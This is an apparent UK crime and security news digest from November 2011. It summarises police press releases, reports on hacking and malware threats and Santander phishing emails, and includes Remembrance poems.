Mr Hogan-Howe said the action was part of his "war on crime" agenda.The operation would "tackle criminals decisively and directly", he said.

Mr Hogan-Howe said: "It's all about responding to local concerns and acting on them to crack down on crime rapidly and effectively. "The idea is that we take our intelligence to a magistrate, ask for a warrant and 'put the doors in' as quickly as possible right across London. "It's a renewed emphasis on Safer Neighbourhoods teams making the most of local intelligence and acting on it."

Operation Hawk comes about a month after the Met carried out a day-long operation targeting uninsured drivers across the capital.

More than 500 cars were seized and 66 people arrested in the operation which involved 1,000 officers.

(25th November 2011)


 

HACKED - ARE YOU NEXT ?
(Metro, dated 22nd November 2011 author James Day)
www.metro.co.uk  [Note 1]

Hackers violated the Pentagon's IT provider and the world's biggest aerospace company this year. But criminals are targeting us too - and children and Facebook will be prime targets for future cyber-crime.

Governments will be on high alert next year as the rise of hacking groups brings an increased threat of cyber-warfare.

Global security experts predict a hacking bonanza, with criminals enjoying a greater choice of targets than ever before. We face three main threats: scams on social-networking sites such as Facebook; targeted attacks, such as those that occurred earlier this year on the Sony PlayStation network and the Pentagon's IT provider and aerospace company, Lockheed Martin; and mobile malware, which infiltrates phone apps or turns your device into a 'bot' that can be controlled by a hacker.

However, the most worrying prediction is the danger to children. M86 Security Labs, based in California, warns child pornographers and kidnappers could be interested in personal photos posted online.

Many digital images are stamped with the GPS co-ordinates of where they were taken, explains Bradley Anstis of M86.

'A lot of people don't realise that, with GPS-enabled devices, your GEO location and GPS co-ordinates can be ripped,' he says. 'If your kids use Facebook to upload a photo of their new bedroom to show friends, an attacker could find the co-ordinates for that address.'

The social media threat should not be underestimated. 'We see more new attacks and more new methods coming through social media than any other channel,' says Anstis.

A new M86 report investigates malicious campaigns on Facebook called 'likejacking', where users are tricked into liking pages linked to malicious or dubious websites. It also claims mobile devices are at increased risk of attack.

'Android is now the most attacked platform,' says Anstic. 'This is no anti-Android thing but its application system is a lot more open to malware. It's very much a Wild West out there in terms of protection and, at the moment, there are only very dubious solutions.

'With the Apple iOS, you have to jump through a lot more hoops, stand on one leg and face the wall before getting your application approved.'

A typical mobile-phone attack is to try and access bank accounts by intercepting text  messages sent by banks to their customers.

It's not just individuals who should worry The rise of hacking groups, such as Anonymous and LulzSec, has increased the risk of organisation and government attacks. 'Hacking groups are all trying to out-do each other and prove who's the best,' says Anstis.

Hacking groups choose their targets for commercial, political or military reasons. Lockheed Martin's attackers, for instance, may have been able to steal fighter jet blueprints.

Anstis says the distinction between cyber-crime and cyber-warfare is becoming blurred. 'Targeted attacks are only a small step from cyber-warfare and cyber-warfare is controlled by countries,' he says.

'With cyber-criminals, there is nothing to stop them from taking another step forward alone and saying: "Hey, why don't we try and overheat some nuclear reactors?" It's scary stuff.'

Even next year's Olympic Games is at risk from hackers. Anstis warns criminals may try ticketing, travel and merchandise scams. Sports fans should be on the lookout for spoof emails that look like they're from legitimate organisations.

'This can be accomplished by publishing a section on its website or a fraud-watch line where suspicious activity can be reported,' says Anstis, who admits Olympic organisers can warn people of the risk. 'There is a real opportunity for London to set a precedent for future events like this.'

(25th November 2011)




NEW TOOL LAUNCHED IN FIGHT AGAINST ANTI-SOCIAL BEHAVIOUR
(Surrey Police, dated 15th November 2011)
www.surrey.police.uk

 

Surrey Police officers in Surrey Heath are trialling a new internet-based CCTV camera in their continued fight against anti-social behaviour in the borough.

Just weeks after it was launched, the new Community Monitored TV (CMTV) system, provided by Jabbakam, is already helping to save time and money in investigating allegations of anti-social behaviour. Real-time images, historical searches and remote control of the camera's position can be accessed any time from any computer, which makes it much more user friendly than traditional CCTV cameras.

Surrey Heath Crime Prevention and Design Advisor John Eldridge has been working on the project in conjunction with local Housing Association Accent Peerless.

He said: "Anti-social behaviour still remains a top priority for residents in Surrey Heath. This new system is fully secure, with the recordings held on the supplier's server. Instead of taking hours to download footage, we can simply log on and gain instant access to the images we want. In one instance, we received a Section 5 public order report and within hours we were able to prove that the allegation was false - saving the investigating officer valuable time."

Mr Eldridge added: "It is already working well so far, with footage already being used for evidence to aid police investigations and resolve crimes. The benefits of this kind of technology for the police and the wider community are endless."

Surrey Police has one camera currently deployed with two more on order and the possibility for a fourth currently under discussion.

(21st November 2011)


 

BOLTON TAKES NATIONWIDE LEAD IN FIGHT AGAINST PUB TROUBLEMAKERS
(Greater Manchester Police, dated 14th November 2011)
www.gmp.police.uk

Bolton has become the first area nationwide to adopt a digital only approach to tackling crime and antisocial behaviour in pubs and clubs.

The borough is the first area in the United Kingdom to adopt a system whereby Pubwatch members do all of their communicating and sharing images of banned individuals online.

The purpose of the move is to improve efficiency of Pubwatch schemes and reduce the operational cost of running them.

Members of the schemes sign up to Pubwatch Online* and are given access to shared pages, which include latest news and information on legislation and individuals banned from other premises. If a person causes trouble in one pub and is banned, he will automatically be banned from all other premises in that Pubwatch scheme.

GMP's Divisional Watch Scheme Officer for Bolton, Mary Harrison said: "Licensees in Bolton work very closely with the police and are committed to ensuring safe and well run venues for everyone to enjoy that are free from crime and disorder.

"Having all of the schemes linked electronically will help us to overcome communication problems and high costs of distributing offender photographs and information across the area.

"We can now provide licensees with faster and easier access to up to date information to help make Bolton's pubs and clubs safer places to work and visit."

Brendan Derham, Chairperson of Westhoughton Pub Watch Licensees Alliance, said: "I am fully supportive of Pub Watch Online. I find it to be an effective tool for licensees to combat crime and disorder and contributes to keeping licensed premises a safe environment for the public."

Frank Marnell of National Pubwatch said: "The use of the Internet to share information is a logical step forward for Pubwatch schemes. The ability to quickly distribute information about banned individuals greatly assists licensees in making the scheme effective with the primary aim of safeguarding the safety of licensed premises customers and staff.

"Digital sharing has proven to be very effective for Pub Watch schemes and the Bolton area is a good example of this."

(21st November 2011)


 

SEX CRIMES INCREASE ON LONDON TRANSPORT
(BBC News, dated 17th November 2011)
www.bbc.co.uk
Crime on London's transport network has decreased according to figures released by Transport for London (TfL), but there was a rise in sexual offences.

The statistics showed a 7.9% reduction in crime for the period from April to September, compared with last year.

But sexual offences increased by 15.7% on the Underground and Docklands Light Railway (DLR) and by 8.8% on the capital's buses.

Robberies have increased on buses, and thefts rose on the Underground and DLR.

But the figures compiled by TfL, the Metropolitan Police and British Transport Police showed there were 1,122 fewer offences on buses over the first six months of this financial year compared with the same period last year - a 9.4% drop.

There were also fewer cases of violence and criminal damage.

Crime on the Tube and DLR fell by 272 offences, a 4.1% drop.

'Low-crime environment'
 
Overall, crime fell from 11.4 crimes per million passenger journeys to 10.5.

London Mayor Boris Johnson said he was pleased the measures put in place over the past three years seemed to be paying off. But the police dealt with more sex crimes than last year.

There were an additional 25 sexual offences on the Underground and DLR and 20 more on the bus network.

Robberies also went up on buses, an increase of 233 or 19.8%. On the Tube and DLR there were six fewer robberies, a decrease of 8.7%, but theft of passenger property rose by 237 cases, an increase of 8%.

Steve Burton, TfL's director of community safety, enforcement and policing, said that while the figures showed overall the network was a low-crime environment, there was no room for complacency.

"Within the next six months we are deploying an additional 413 warranted police officers in the Safer Transport Command to provide Londoners with the safe network they expect," he said.

TfL added that despite increases in certain offences, the numbers were low in the context of the billions of journeys made on the system each year.

Further information

TfL crime figures : http://www.tfl.gov.uk/corporate/about-tfl/19385.aspx

(21st November 2011)


 

ARMISTICE

FOR THE FALLEN
Laurence Binyon (1869-1943)

With proud thanksgiving, a mother for her children,
England mourns for her dead across the sea.
Flesh of her flesh they were, spirit of her spirit,
Fallen in the cause of the free.

Solemn the drums thrill; Death august and royal
Sings sorrow up into immortal spheres,
There is music in the midst of desolation
And a glory that shines upon our tears.

They went with songs to the battle, they were young,
Straight of limb, true of eye, steady and aglow.
They were staunch to the end against odds uncounted;
They fell with their faces to the foe.

They shall grow not old, as we that are left grow old:
Age shall not weary them, nor the years contemn.
At the going down of the sun and in the morning
We will remember them.

They mingle not with their laughing comrades again;
They sit no more at familiar tables of home;
They have no lot in our labour of the day-time;
They sleep beyond England's foam.

But where our desires are and our hopes profound,
Felt as a well-spring that is hidden from sight,
To the innermost heart of their own land they are known
As the stars are known to the Night;

As the stars that shall be bright when we are dust,
Moving in marches upon the heavenly plain;
As the stars that are starry in the time of our darkness,
To the end, to the end, they remain.


 

DO NOT STAND AT MY GRAVE AND WEEP
Mary Frye (1905-2004)

Do not stand at my grave and weep,
I am not there, I do not sleep.
I am in a thousand winds that blow,
I am the softly falling snow.
I am the gentle showers of rain,
I am the fields of ripening grain.
I am in the morning hush,
I am in the graceful rush
Of beautiful birds in circling flight,
I am the starshine of the night.
I am in the flowers that bloom,
I am in a quiet room.
I am in the birds that sing,
I am in each lovely thing.
Do not stand at my grave and cry,
I am not there. I do not die.

(11th November 2011)


 

WHATS NEW IN COMPUTER SECURITY - OCTOBER

All the links under this heading are [Note 1]

The following is a group of article summaries on what is happening around the World when it comes to computer security. One way or another at least one of them will affect you.

MASSIVE SWEDISH HACKS LEAK DETAILS ON 400,000 USER ACCOUNTS
(Computer World, dated 27th October 2011 author Mikael RickNas)

Full Article : http://cwonline.computerworld.com/t/7667302/930454165/537572/0/


The details of more than 400,000 user accounts have leaked onto the Internet in Sweden, following a series of attacks that have affected about 60 websites.

The hacking scandal started to get attention Tuesday, when a Twitter account belonging to Swedish politician William Petzll was used to publish passwords to email accounts belonging to some prominent journalists. Petzll, who is currently undergoing treatment for addiction, denied that he had anything to do with it, and said that his Twitter account had been hijacked. The account was subsequently closed.

The source of the passwords turned out to be blogging site Bloggtoppen.se, which was vulnerable to an SQL injection attack. Its user database, which included details for approximately 94,000 accounts, was published back in September on a site called Flashback, and then distributed via Twitter, as well.

Users repeatedly using the same password makes matters worse


 

FRAUDSTERS FIND CREATIVE WAYS TO ABUSE E-COMMERCE SITES
(Computer World, dated 24th October 2011 author Jeremy Kirk)

Full Article : http://cwonline.computerworld.com/t/7659985/930454165/536483/0/

Even if your company website is secured with the latest software patches and has been tested by ethical hackers, it doesn't mean the scammers will stay away.

In fact, fraudsters are actually highly adaptable, looking for ways to exploit marketing campaigns or incentive programs. They often find ways to abuse a system that weren't considered by either fraud or security specialists, said Laura Mather, founder and chief strategy officer of Silver Tail Systems ( a company's whose software looks for odd behavior during transactions on e-commerce and banking sites).

Take the company that ran a marketing incentive program offering $5 to people who referred their friends to sign up for an account. The company, which gave away a total of $8 million, gave $2 million of that to just one person in Eastern Europe, Mather said.


 

BREACH REPORTING : NOW COMPANIES IN THE US HAVE TO DO IT
(Computer World, dated 17th October 2011 author Scott Bradner)

Full Article : http://cwonline.computerworld.com/t/7645440/930454165/535629/0/


Consumer advocates as well as many business groups have attempted to get federal laws adopted in the United States that would mandate disclosure of security breaches in which some types of private information about identifiable people are exposed. In spite of the obvious logic of having a national standard, these efforts so far have failed.

But a recent action by the Securities and Exchange Commission may have created a disclosure requirement more sweeping than any of the legislative proponents could have wished for.



SPYEYE MALWARE CONTINUES TO PLAGUE COMPUTERS
(Computer World, dated 14th October 2011 author Jeremy Kirk)

 

Full Article :http://cwonline.computerworld.com/t/7642164/930454165/535418/0/

The SpyEye banking malware continues to plague computers across the world and is proving to be a difficult foe to detect and remove from infected Windows PCs, according to two researchers from EMC's RSA security division.

SpyEye has been around for more than a year and is the successor to the Zeus banking malware. SpyEye emerged after the author of Zeus, who went by the screen name "Slavik," stopped developing it. But another person by the name "Harderman" took over the project, Rivner said.

SpyEye is a kit that is sold to other online criminals. It's easy to use, and people need a high level of technical skills to conduct an attack.


 

CYBERCRIME GETTING EASIER TO COMMIT, FEDS SAY
(Computer World, dated 7th October 2011 author Nancy Gohring)

Full Article :http://cwonline.computerworld.com/t/7627740/930454165/534486/0/

Committing cybercrime these days is as easy as building a fantasy football team, FBI and Secret Service agents said on Friday.

"I'm concerned that the cyber-underground is a beautiful business model. It's like going to eBay or Amazon. You just pick what you need -- coders, mules -- and build a dream team. It's like fantasy football," said Gordon Snow, assistant director in the U.S. Federal Bureau of Investigation's cybercrime division.


 

111 ARRESTED IN MASSIVE ID THEFT BUST
(Computer World, dated 7th October 2011 author Robert McMillan

Full Article : http://cwonline.computerworld.com/t/7627740/930454165/534484/0/

Prosecutors call it the biggest identity theft bust in U.S. history. On Friday, 111 bank tellers, retail workers, waiters and alleged criminals were charged with running a credit-card-stealing organization that stole more than $13 million in less than a year-and-a-half.

The credit card numbers came from far and wide: from skimming operations in the U.S., where restaurant employees or retail cashiers were paid to steal credit card data from customers; from carder forums on the Internet; and also from shady overseas suppliers in countries such as Russia, China and Libya.


 

FAILING A SECURITY AUDIT ALREADY - ITS GOOD FOR YOU
(Computer World, dated 4th October 2011 author Andreas M Antonopoulos)

Full article : http://cwonline.computerworld.com/t/7619526/930454165/533927/0/

Failing an audit sounds like the last thing any company wants to happen. But that's because audits are seen by many as the goal of a security program. In reality, audits are only the means of testing whether enforcement of security matches the policies. In the broader context, though, an audit is a means to avoid a breach by learning the lesson in a "friendly" exercise rather than in the real world. If the audit is a stress-test of your environment that helps you find the weaknesses before a real attack, you should be failing audit every now and then. After all, if you're not failing any audits there are two possible explanations:

1) You have perfect security.

2) You're not trying hard enough.


 

SCAMMERS PRETEND TO BE FRIENDLY OFFICE PRINTERS
(Computer World, dated 27th September 2011 author Jeremy Kirk

Full article : http://cwonline.computerworld.com/t/7604242/930454165/532621/0/


Hackers have found a new hook to trick people into opening malicious attachments: send emails that purport to come from office printers, many of which now have the ability to email scanned documents.

"This is a new tactic we haven't really seen before," said Paul Wood, senior intelligence analyst for Symantec.cloud, the company's Web-based security and email branch.

The emails invariably contain some kind of Trojan downloader, which can be used to download other malware or steal documents from the computer.

Symantec published examples of the emails collected recently in its latest monthly Symantec Intelligence Report, released on Tuesday. The emails at first glance look quite convincing, with a subject line "Fwd: Scan from a HP Officejet." The email reads "Attached document was scanned and sent to you using a Hewlett-Packard HP Officejet 05701J" and then "Sent by Morton."

Wood said it is common for the scammmers to spoof the sender's name and make it appear the email came from the same domain as the one that belongs to the recipient. Some of the messages captured by Symantec appear to be at a cursory glance internal company email, which makes it more likely that the person who receives the message will open the attachment.


 

NEW MAC MALWARE POSES AS PDF DOC
(Computer World, dated 23rd September 2011 author Gregg Keizer)

Full article : http://cwonline.computerworld.com/t/7597510/930454165/532213/0/

Security firms today warned Mac users of a new Trojan horse that masquerades as a PDF document.

The malware, which was spotted by U.K.-based Sophos and Finnish antivirus vendor F-Secure, uses a technique long practiced by Windows attackers.

"This malware may be attempting to copy the technique implemented by Windows malware, which opens a PDF file containing a '.pdf.exe' extension and an accompanying PDF icon," said F-Secure today.

That practice relies on what is called the "double extension" trick: adding the characters ".pdf" to the filename to disguise an executable file.

The Mac malware uses a two-step process, composed of a Trojan "dropper" utility that downloads a second element, a Trojan "backdoor" that then connects to a remote server controlled by the attacker, using that communications channel to send information gleaned from the infected Mac and receiving additional instructions from the hacker.


 

CYBER RISK AND THE FUTURE OF THE UNITED STATES
(Computer World, dated 22nd September 2011 author Michael Assante)

Full article : http://cwonline.computerworld.com/t/7592529/930454165/532068/0/

In September 2007, in a remote laboratory in Idaho, researchers working on a project dubbed "Aurora" demonstrated the ability of a cyber hacker to destroy physical equipment -- in this case a generator used to create electricity for the power grid. The Aurora research brought the question of physical safety and the ability for a nation to defend itself from attack in the cyber world to the forefront. For the next three years, this difficult discussion would largely remain just a discussion, contemplated, if passionately, in corners of Washington and at wonk-ish meetings across the U.S.


 

3000 US INTELLIGENCE OFFICIALS NAMES, EMAILS LEAKED
(Computer World, dated 19th September 2011)

Full article : http://cwonline.computerworld.com/t/7584039/930454165/531595/0/


Last week, a "premier intelligence and national security organization" was hacked and then hundreds of intelligence officials, ranging from the NSA, FBI, CIA, the Pentagon, the White House, had their names, email addresses, some phone numbers and even home addresses posted on Cryptome.

Intelligence and National Security Alliance (INSA) published a Cyber Intelligence report [PDF] about the need to develop better cyber intelligence sharing, analysis and defenses against the "cyber threat environment" where hackers are cracking into everyone's systems, from government agencies to private companies. 48 hours later, a cyberattack was launched against INSA website and the membership list was leaked after the hack.

MSNBC reported that "in apparent retaliation, INSA's 'secure' computer system was hacked and the entire 3,000-person membership posted on the Cryptome.org." There were 95 email addresses belonging to the "supersecret National Security Agency, as well as scores of others in key positions at the White House, the Pentagon, FBI, CIA, the Office of Director of National Intelligence and the State Department."  John Young who runs Cryptome said in a telephone interview with NBC that he had no reservations about publishing 'INSA Nest of Official and Corporate Spies.' Young said, "We would love to name every spy that lives on Earth."


 

HACKERS HIT JAPANS BIGGEST DEFENSE CONTRACTOR
(Computer World, dated 19th September author Gregg Keizer)

Full article : http://cwonline.computerworld.com/t/7584039/930454165/531594/0/
Follow-up article : http://cwonline.computerworld.com/t/7585799/930454165/531747/0/


Japan's largest defense contractor, Mitsubishi Heavy Industries, today acknowledged that scores of its servers and PCs had been infected with malware, but denied that any confidential information had been stolen.

The Daily Yomiuri, citing confidential sources, first reported the attack, which involved as many as eight different types of malware, including Trojan horses.

A U.S.-based Mitsubishi spokesman confirmed that the company had uncovered a large-scale intrusion that had planted malware on 45 servers and an additional 38 individual PCs in several locations around Japan.

Servers at Mitsubishi's Kobe shipyards, where the company builds diesel-electric submarines and components for nuclear power plants; at the company's Nagasaki shipyards; and at its Nagoya plant, which designs and manufactures missile guidance systems, were among those compromised, the spokesman said.

Mitsubishi Heavy's corporate headquarters in Yokohama was also affected by the infection.

(11th November 2011)


 

MORE NEWS FROM MY SPAM INBOX- NOVEMBER (Special) !
Category : phishing
 
My Internet Service Providers (ISP) spam filter appears to have again done a very good job so far this month. It appears that the phishers have become a little myopic so far this month and have chosen to pick on the customers of only one bank. Six bogus e-mails phishing Santander accounts received in the same number of days, hence this early warning.

- From Santander UK, titled "Reinstate your account"(3 x emails): A slight error occured during our security update. Someone has made suspicious attempts to log into your account, etc. Proceed to (bogus link provided) to confirm your details.

- From Santander Online, titled "Verify your Account" : Please update your Santander Online Banking account information. It's easy, click on the bogus link below.

- From Santander UK, titled "New changes to your Santander accounts : Your Santander account could have been violated. Someone with IP address xx.xxx.xx.xxx tried to access your personal account. Please click on the bogus link below and enter your account information.

- From Santander UK, titled "Reinstate Your Santander Account(s)" : An error was detected in your Santander online banking account during our security update today. We've recently noticed that someone has made suspicious attempts to log into your online account. Therefore our secuity commitment forces us to block you account temporarily until you verify your identity on our systems. Proceed to (bogus link provided) to confirm your details.

These e mails are bogus and are just phishing for personal information. If you receive anything like thme, delete it immediately and do not open any attachments. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number, NOT contact details within the bogus e-mails.

(10th November 2011)


 

GET SAFE ONLINE WEEK LAUNCHED
(SOCA, dated 7th November 2011)
www.soca.gov.uk/

The increase in smart phone malware is one of the key threats being highlighted during this year's annual Get Safe Online Week. At a Summit to launch the week, Francis Maude, Minister for Cyber Security, introduced a new Rough Guide to Online Safety.

Minister for the Cabinet Office, The Rt Hon Francis Maude MP, comments: "More and more people are using their smart phone to transmit personal and financial information over the internet, whether it's for online banking, shopping or social networking.

"This latest research from Get Safe Online shows that 17 per cent of smart phone users now use their phone for money matters and this doesn't escape the notice of criminals. So while accessing the web via a mobile device can be fun and save time, it's important to be vigilant.

"This week, we are encouraging everyone to take a few moments to visit www.getsafeonline.org and make sure they follow the right advice for using mobile devices securely and safely."

Some Smart phone users are getting a nasty surprise when they see their monthly bills, discovering that they have run up huge phone bills for premium-rate text messages they did not send.

This is one of the latest scams being used by online criminals to profit from the recent boom in smart phones and mobile web applications (apps), experts at GetSafeOnline.org are warning today.

Fraudsters are using online app stores to entice smart phone users to download rogue apps. Often masquerading as 'free levels' to popular and legitimate online games, or even as security tools, these rogue apps disguise malicious software (malware) which the user unwittingly downloads at the same time.

Once downloaded, this malware enables fraudsters to take control of the victim's phone, allowing them to make calls, send and intercept SMS and voicemail messages, and browse and download online content. This enables them to gain access to all personal and payment data available on the phone - which can then be sold onto and used by identity fraudsters - and to 'spam' other mobile web users to commit further fraud.

For information and advice on how to guard against online fraud and other internet crime or to download the Rough Guide to Online Safety , visit the Get Safe Online website at www.getsafeonline.org. Online fraud should be reported to Action Fraud www.actionfraud.org.uk.

(9th November 2011)


 

CARD SKIMMING PREVENTION VIDEO LAUNCHED
(Northern Constabulary, dated 7th November 2011)
www.northern.police.uk/

Northern Constabulary have produced a short video aimed at protecting the public from becoming victims of card skimming.

The informative seven minute film, features Inverness Community Safety officer PC Euan McGibbon and chair of Crimestoppers for Highlands and Islands Jim Ferguson, is available on the Northern Constabulary website and on the Force's Facebook and Twitter channels.

The film provide people with an easy to remember acronym (C.H.I.P.) which Police hope the public will bear in mind when using ATMs.

C is for check the machine.

H advises you to hide your pin.

I means inform the Police and the bank and

P means put your money/cash away.

By following this advice you can greatly reduce the chances of becoming a victim of this crime

Teams of organised criminals have in the past targeted ATM users by stealing their bank card details and PIN numbers with sophisticated card-skimming devices and cameras.

The film shows the public what to look out for and goes into details about how these machines work.

The Force has already has success in relation to this type of crime. On 9 August 2011, two men were jailed at Inverness Sheriff Court as a result of their involvement in card skimming at ATMs in the Inverness area in March of this year.

This was a result of extensive enquiry by Northern Constabulary. Those convicted were part of a wider, organised criminal network and continued vigilance by both the police and members of the public is required.

The provides useful advice so that members of the public know more about this type of crime and can be better informed when they use ATMs.

To see the 7 minute video click to go to the Northern Constabulary's "Scams" webpage :

www.northern.police.uk/scams.htm

(9th November 2011)




ALLEGED MEMBERS OF A GANG WHO TRAFFICKED PEOPLE INTO UK ARE BAILED
(Courtesy of: Metropolitan Police, dated 3rd November 2011)
www.met.police.uk

 

A Polish gang who trafficked more than 200 people to the UK as part of a multi-million pound benefit fraud has been smashed following a joint investigation by the Metropolitan Police, Her Majesty's Revenue and Customs (HMRC) and the Polish police.

The two-year operation, initiated by the Posen Appeals Prosecution Office (in Poland), culminated on 2 November in 29 people being arrested in Poland and five addresses searched in London, resulting in two arrests (a man and woman aged their 40s). Searches were also carried out in Birmingham.

The two arrested in London - both Polish nationals - are now bailed to return to a south London police station on 12 December pending further inquiries.
Inquiries found the gang, based in Poland, promised at least 230 victims - many of whom had alcohol or mental health problems - work in the UK.

They then brought the victims to stay in various addresses in this country and tricked them into signing papers to open bank accounts.

The criminals then fraudulently applied for Tax Credit and other benefits using the victim's details and got the money paid into the newly created accounts.

The money was emptied from the accounts by gang members and sent back to the ringleaders in Poland while the trafficked victims were left destitute.

It is believed the scam has cost the UK more than £2million.

Uniformed Polish police officers joined officers from the Human Exploitation and Organised Crime Command (SCD9), Territorial Support Group (TSG) and local officers to search addresses in south and east London for further evidence.

The search warrants coincided with police back in Poland arresting suspected members of the gang as they gathered for a wedding.

Det Insp Kevin Hyland, from SCD9, said: "These vulnerable victims were trafficked here to be exploited and satisfy the greed of these criminals. They were brought here under the impression they were getting a job but were left with nothing, with many ending up on the street.

"The complex international dimension to this inquiry meant that it was vital to have a close relationship with the Polish authorities, which is why they joined us on this operation this week.

"These arrests are the first step in these victims getting justice in their home country and have prevented more money being stolen from the public purse."

Assistant Director John Pointing, from HMRC Criminal Investigation London, said: "During this operation, HMRC investigated over 230 Tax Credit awards with a value in excess of £2,000,000. We suspect the claims have been submitted by a criminal gang trafficking people who have then acquired their victims' identities to commit fraud in the UK.

"The evidence HMRC gathered has played a vital role in the strategic planning of this international investigation and has directly supported the arrest of suspects in Poland and the UK.

"Tax Credits are designed to help lower income families and individuals. HMRC treats criminal attacks on all its systems very seriously and works constantly with our law enforcement partners, here and abroad, to detect, investigate and prosecute offenders."

Police Major Monika Sokolowska from the Central Unit for Trafficking in Human Beings, in Poland, said "This form of trafficking is a new phenomenon in Poland at this present moment. In the past we were used to dealing with cases where people were trafficked for prostitution or for slavery but this new form of trafficking is becoming ever more prevalent.

"This is a big case for us with over 200 statements taken from vulnerable witness who were exploited. These people were trafficked to the UK by criminals and did not receive any of the social benefits that were fraudulently claimed in their name.

"This has been an ongoing case working with officers from the MPS and other partner agencies, and much has been achieved today because of the partnership work involved."

Most of the victims are now back in Poland and have been supported by the Polish authorities.

(9th November 2011)


 

BORDER SCREENING RESULTS IN TEN THOUSAND ARRESTS
(Home Office, dated 3rd November 2011)
www.homeoffice.gov.uk 

Ten thousand wanted criminals have been arrested at the border as a result of e-Borders, an advance passenger screening programme.

E-Borders is a system by which air carriers and operators of vessels submit passenger and crew details electronically prior to travel from and to the UK.

There are now an average of 52 arrests per week at ports and airports across the country for a range of crimes, immigration and customs offences as a result of the screening system which was introduced in 2005.

381 million passengers have been processed through the system since 2005, which has resulted in over 10,000 arrests for murder and rape, seizures of Class A drugs, and the refusal of entry to the UK for immigration offenders and overstayers.

Immigration Minister Damian Green said: "The government is doing more than ever before to protect the UK's border. By checking passenger and crew information before, travel law enforcement agencies can apprehend those trying to evade justice.

"From 2013 the new dedicated Border Policing Command, part of the National Crime Agency, will further strengthen security at the border, providing leadership and coordination based on a single national threat assessment and strategy."

How It Works

122 carriers on over 3,000 routes provide passenger data to e-Borders. The UK's National Border Targeting Centre screens the passenger and crew data and generates alerts as a result of intelligence and targeting.

The suspects wanted by the UK Border Agency, police, the Serious Organised Crime Agency (SOCA) and HM Revenue & Customs can then be apprehended before entering or departing the country.

About E-Borders :

www.ukba.homeoffice.gov.uk/customs-travel/beforetravel/advanceinfopassengers/

(9th November 2011)


 

ONLINE FRAUD CAMPAIGN SAVES MILLIONS
(City of London Police, dated 31st October 2011)
www.cityoflondon.police.uk

A major National Fraud Intelligence Bureau (NFIB) campaign to shut down the websites, email addresses and telephone numbers fuelling much of today's fraud has already stopped at least £7 million being lost to fraudsters in the last 2 months.

During September and October the NFIB has suspended 12 websites, 179 telephone numbers and 155 email accounts, which were enabling organised crime gangs to target and steal from individuals and the public and private sector.

The threat of personal information being stolen through phishing e-mails is now being tackled in partnership with UK Payments Administration (UKPA). 978 emails have been passed to the UKPA-run www.banksafeonline.org.uk, for suspension.

NFIB analysis has shown how fraudsters can be resilient, with the ability to quickly reinvent their criminal operation.

Re-creation of websites

In recent months the NFIB has identified fraudsters who are reproducing suspended websites with a similar sounding name and/or signing up for new phone numbers with a different provider. The public is told this has been done for 'technical reasons'.

The NFIB has moved quickly to block this new line of attack.

People who visit certain suspended websites are now being automatically redirected to an alert page on the NFIB website. This provides users with a fraud warning and directs people who believe they have been a victim of fraud to Action Fraud. For legal reasons some ISPs have not been able to comply with the redirection but overall the system is making a positive impact.

Visit www.saltzmankramer.com to see how the NFIB is unmasking the criminal practices of online fraudsters.

The NFIB is taking a similar approach with phone numbers. Once a number is identified as part of a fraudulent operation, the NFIB looks to suspend the line and leave a message to callers explaining exactly why, along with details on how to contact Action Fraud. The aim is to stop the same victim being repeatedly conned and to protect any new, prospective victims.

(9th November 2011)


 

FORCES VITAL STATISTICS MADE PUBLIC
(Police Oracle, dated 28th October author Cliff Caswell)
www.policeoracle.com  [Note 1]

Policing professionals have welcomed a new tool from Her Majesty's Inspectorate of Constabulary that enables the public to see vital force statistics across England and Wales.

The Inspectorate's new online Crime and Policing Comparator gives the public the opportunity to compare crime, quality of service and cost and workforce data through the NPIA-managed http://www.police.uk site. And professionals believe it holds great promise.

The online tool - which can also be accessed through via http://www.hmic.gov.uk - is designed to support the government agenda of improving accountability and brings together data from all 43 forces for the past three years.

By clicking on http://www.police.uk, users are presented with a box from HMIC showing crime trends for a time over time plus a link to the new Comparator. The tool provides a raw data file readable by a spreadsheet programme.

Sir Denis O'Connor, HM Chief Inspector of Constabulary said that the data would give members of the public a comprehensive picture of policing.

He added: "Part of our role at HMIC is to provide the public with reliable information about the police. That is why we have produced this easy to use online tool.

"To ensure the public get a complete picture of policing, the Inspectorate continues to inspect forces and publish professional judgements in our reports."

Senior policing professionals have welcomed the new service as a step forward for transparency but emphasised that policing and its costs could differ markedly between areas.

CC Grahame Maxwell, of North Yorkshire Police, said: "We support this kind of transparent and publicly accountable insight into an organisation and its performance. The strive to improve and become even more efficient and effective must be encouraged, never more so in these times of austerity.

"Of course, no two forces are the same and the ways of working in a huge, largely rural policing area such as North Yorkshire can contrast markedly with a smaller, urban policing area. So to try and draw direct comparisons is not really possible."

Mark Burns-Williamson, Chairman of the Association of Police Authorities, said the Comparator put powerful information about law enforcement into public hands.

He added: "As those responsible for holding the police to account until November 2012, we will draw rigorously on the revelations within this site to help consolidate our legacy of a more efficient and more effective police service for the public."

(9th November 2011)


 

UK CYBER ATTACKS AT DISTURBING LEVELS, WARNS GCHQ CHIEF
(Guardian, dated 31st October 2011 author James Meikle)
www.guardian.co.uk  [Note 1]

A "significant but unsuccessful" cyber-attack was made on the Foreign Office and other government departments this summer, according to GCHQ.

Iain Lobban, director of the government's listening centre, said the UK's "continued economic wellbeing" was under threat because of a "disturbing" number of such attacks on the government, industry and members of the public.

Writing in the Times, he said sensitive data on government computers had been targeted, along with defence, technology and engineering firms' designs.

"I can attest to attempts to steal British ideas and designs - in the IT, technology, defence, engineering and energy sectors, as well as other industries - to gain commercial advantage or to profit from secret knowledge of contractual arrangements," said Mr Lobban.

"Such intellectual property theft doesn't just cost the companies concerned. It represents an attack on the UK's continued economic wellbeing.

"We are also aware of similar techniques being employed to try to acquire sensitive information from British government computer systems, including one significant (but unsuccessful) attempt on the Foreign Office and other government departments this summer."

Mr Lobban did not give further details, but added: "Criminals are using cyberspace to extort money and steal identities, as well as exploit the vulnerable. Increasingly sophisticated techniques target individuals.

"We are witnessing the development of a global criminal market place - a parallel black economy where cyber dollars are traded in exchange for UK citizens' credit card details. Tackling cyber crime matters and it is a very real threat to our prosperity."

Mr Lobban's article comes before a conference in London on Tuesday on cyber-security, including political leaders and technology experts. Among the delegates will be Hillary Clinton, the US secretary of state, and Jimmy Wales, co-founder of Wikipedia.

William Hague, the foreign secretary, told the Times there had been an "exponential rise" in incidents, with welfare and tax databases among systems "liable to attack".

"Countries that cannot maintain cybersecurity of their banking system, of the intellectual property of their companies, will be at a serious disadvantage in the world."

